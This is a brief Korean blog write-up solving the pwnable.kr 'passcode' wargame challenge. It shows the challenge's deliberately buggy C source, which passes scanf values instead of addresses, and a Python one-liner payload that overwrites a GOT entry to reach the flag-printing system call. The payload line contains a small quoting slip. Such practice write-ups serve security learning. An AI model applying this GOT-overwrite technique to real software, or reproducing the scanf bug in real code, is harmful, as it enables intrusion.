본문 바로가기

WARGAME/Pwnable.kr

pwnable.kr passcode

ㅎㅇ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#include <stdio.h>
#include <stdlib.h>
 
void login(){
    int passcode1;
    int passcode2;
 
    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);
 
    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);
 
    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}
 
void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}
 
int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");
 
    welcome();
    login();
 
    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;    
}
 
 
cs

ㅇㅇ 이런 소스가 있는데

메인을 보면

welcome 함수를 호출하고 

그다음 login 함수를 호출함


login 함수를 보면 &이게 없음

처음에 그냥 입력하면 되는 줄 알고 왜 10점인가 보고 있는데

&이게 보임


GOT를 이용해

/bin/sh 넣어줌


페이로드부터 보면

(python -c 'print "\x41"*96+"\x00\xa0\x04\x08+"134514147"') | ./passcode


scanf("%100s",name)

여기서 오버플로우가 일어나 96바이트 이후로 

4바이트를 조작할 수 있다


4바이트 조작할 주소는 804a000이고

뒤에 숫자 134514147


0x080485e3을 10진수로 나타낸 숫자다

이렇게 끝




'WARGAME > Pwnable.kr' 카테고리의 다른 글

pwnable.kr coin1  (0) 2017.01.09
pwnable.kr simple login  (0) 2017.01.06
PWNABLE KR ascii_easy  (0) 2016.03.28
PWNABLE KR uaf  (0) 2016.03.24
PWNABLE KR CMD1  (0) 2016.02.09